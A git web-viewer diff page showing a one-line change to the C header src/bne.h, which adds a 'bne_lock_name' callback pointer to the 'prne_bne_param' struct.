aboutsummaryrefslogtreecommitdiff
path: root/src/bne.h
diff options
context:
space:
mode:
Diffstat (limited to 'src/bne.h')
-rw-r--r--src/bne.h1
1 files changed, 1 insertions, 0 deletions
diff --git a/src/bne.h b/src/bne.h
index a776f2b..9df4dde 100644
--- a/src/bne.h
+++ b/src/bne.h
@@ -36,6 +36,7 @@ struct prne_bne_param {
} vector;
struct {
char *(*exec_name)(void *ctx);
+ char *(*bne_lock_name)(void *ctx);
bool (*enter_dd)(void *ctx);
void (*exit_dd)(void *ctx);
uint64_t (*uptime)(void *ctx);